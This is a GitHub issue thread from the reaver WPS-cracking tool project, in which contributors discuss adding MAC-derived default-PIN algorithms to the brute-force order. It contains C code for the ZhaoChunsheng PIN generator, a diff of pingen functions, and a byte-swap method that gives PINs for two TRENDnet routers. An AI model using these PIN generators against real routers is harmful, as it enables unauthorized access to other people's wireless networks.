t6x/reaver-wps-fork-t6x #6: algorithms and *.wpc file optimization (standard brute force order)

kcdtv, 2015-04-19:
Hello everybody. :)
  I would like to suggest you an idea...
th_6 introduced the option to generate the default PIN using some known algorithm
That's a really great idea.
  I think that it could be used also to optimize the *.wpc file. The "*.wpc" files are those files that you will find in your reaver folder and keep a record of the attack
  It is composed with first number that keep the progress made and then you have the first half of PIN and the seconds one (without last digit, checksum seems to be genrated live)
 
 b the wpc file always start with 1234 for first half and then 567 for last choice.
That's good because that the PIN enabled if no PIN is defined by the router (the default PIN of WPSW protocol)
Then i think  should be generated as second PIN the one tht follows the ZaoCHeChung alforithm ( cf computePIN / WPSPIN ) 
bssid hexadecimal >>> decimal
 

---------------------------------------------------------
original code for comuptePIN
--------------------------------------------------------

#include ＜stdio.h＞
#include ＜stdlib.h＞</code>
 
int main()
{
 
unsigned int wps_pin_checksum(unsigned int pin);
int PIN = 0;
 
printf("ComputePIN-C83A35\n");
printf("Description:\n");
printf("If your wireless router MAC address start with \"C83A35\",\n");
printf("type the other six digits, you might be able to get the \n");
printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
printf("Input MAC Address(HEX):c83a35");
scanf("%x",&PIN);
printf("MAC Address(HEX) is: C83A35%X\n",PIN);
printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));
 
return 0;
}
 
unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}
 
return (10 - accum % 10) % 10;
}

-.--------------------------------
end of code
---------------------------------

This algorithm has been used among several builderswordwilde the last past 7 years

And could be generated indiscriminately Pin with other known algorithm to place them at the beginning of the wpc.file instead of random strings
(yes i know, they are not random and are made using markov algorithm, but that bullshit, there are no criteria or method to set up a markov approach)

cheers

t6x, 2015-04-20:
I found a router with this month, I will test it when I have time.
now on the option.
The to do, we just decide how you will be, the pin will be generated at the time? because of to identify the mac or Let's an option for that?
Just decide how we will do, that I start to do

t6x, 2015-04-20:
To identify the Mac, notify the User about it and generate the pin and already test

Is it the best way?

DarkJester, 2015-04-20:
t6x, "To identify the Mac, notify the User about it and generate the pin and already test" is the best way i think

kcdtv, 2015-04-20:
I am on the save wave 
 I think also that is the best way;
 Even it that the way that requires more work, as a little "data base" as to be coded and maintained for this bssid distinction to be efficient.
  But it would be the "smartest"/"!more efficient way" with in some case really nice results

  I would be very happy to help you to setup it up; and to help you to create and maintain this database for a smart approach in the election of the PIN to be send first.
I will propose you a detailed "project" and approach with full explanation if you think this idea is relevant and could be interesting for the project.

  Thank you for taking the time to read and answer and thank you for what would be known as "reaver 2.0 "
 I am sure about it ;)
  cheers

crushedice2000, 2015-07-20:
@kcdtv: Good idea!  Can I help? ~~I'm cs122 from Lampiweb~~

kcdtv, 2016-01-15:
Hi guys!
I published some time ago another algorithm for TRENDnet ac1900 and ac3200.
https://packetstormsecurity.com/files/132477/TRENDnet-TEW-818RDU-PIN-Disclosure.html
i wanted to learn C to program it buy i decided to learn python so i didn't do it.
it is very simple and similar to the one exposed in first post of this thread.
if your mac adress looks like this 00:00:00:11:22:33 you take out the first half and you will have to invert the fourth and last pair of digits
so you get 33:22:11
You convert to decimal, add the checksum  and you have the PIN
if i see the code of kiborg and t_6x
```
 //Zhaochunsheng algorithm/
-//mac to decimal by kib0rg
 int pingen_zhaochunsheng(char *mac, int add)
 {
     int default_pin=0, pin=0, i=0, pin_len = 9;
@@ -599,3 +598,18 @@ int pingen_zhaochunsheng(char *mac, int add)
 
     return pin;
 }

//mac to decimal by kib0rg
int pingen_zyxel(char *mac, int add)
{
    //pingen make by kib0rg, a little change by t6x
    int pin;

    char mac_address[7] = {0};
 
    sprintf(mac_address, "%c%c%c%c%c%c", mac[6], mac[7], mac[8], mac[9], mac[10], mac[11]);

    pin = (hexToInt(mac_address) + add) % 10000000;

    return (pin * 10) + wps_pin_checksum(pin);
}
```
it would be basically writing the line "printf" like this : 
```
sprintf(mac_address, "%c%c%c%c%c%c", mac[10], mac[11], mac[8], mac[9], mac[6], mac[7]);
```

The algorithm is used by 2 devices : TRENDnet TEW-818DRU (ac1900) and 828DRU (ac3200)
cheers

crushedice2000, 2016-01-21:
@kcdtv: Great! Really the vendors are turning less and less imaginative. ;-)

kcdtv, 2016-02-11:
:smile:
  It was hard to believe when i realized that they just inverted the first and last bytes of the second part of the 2.4 Ghz bSSID. 
  But yeah... they did it! And they did it twice... for their latest routers that coast around 200$... 
Very cheap default security parameters : PIN enabled, unique for 5Ghz and 2.4Ghz network, it cannot be changed  and so easy to generate.

kcdtv, 2017-06-24:
This issue is old and maybe badly focused: too much different subjects in one thread.
It's better to close it and we'll speak about algorithms (former -W option) or crack optimization in new dedicated and more focused issues.

closed 2017-06-24 by kcdtv